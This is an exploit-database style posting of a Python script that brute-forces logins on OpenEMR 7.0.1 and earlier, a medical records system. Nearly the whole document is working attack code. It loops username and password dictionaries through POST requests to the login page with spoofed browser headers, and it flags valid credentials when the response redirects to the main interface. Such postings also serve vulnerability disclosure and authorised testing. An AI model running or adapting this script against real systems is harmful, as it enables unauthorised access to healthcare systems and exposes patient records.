OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass
OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.
# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l -u username -p pass.txtpython3 exploitBF.py -l -ul user.txt -p pass.txtpython3 exploitBF.py -l -ul /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l","--url", help="Path to OpenEMR (Example:") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary") parser.add_argument("-p","--passlist", help="Password Dictionary") args = parser.parse_args()if len(sys.argv) < 2: print (f"Exploit Usage: python3 exploitBF.py -h") sys.exit(1) # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password): session = requests.session() r = session.get(LoginPage) # Progress Check process = log.progress('Brute Force')#Specifying Headers Value headerscontent = { 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Referer' : f"{LoginPage}", 'Origin' : f"{LoginPage}", }#POST REQ data postreqcontent = { 'new_login_session_management' : 1, 'languageChoice' : 1, 'authUser' : f"{Username}", 'clearPass' : f"{Password}" }#Sending POST REQ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password process.status('Testing -> {U}:{P}'.format(U = Username, P = Password)) #Conditional loops if 'Location' in r.headers: if "/interface/main/tabs/main.php" in r.headers['Location']: print() log.info(f'SUCCESS !!') log.success(f"Use Credential -> {Username}:{Password}") sys.exit(0) #Reading User.txt & Pass.txt filesif Username_list: userfile = open(Username_list).readlines() for Username in userfile: Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile: Password = Password.strip() login(Username,Password)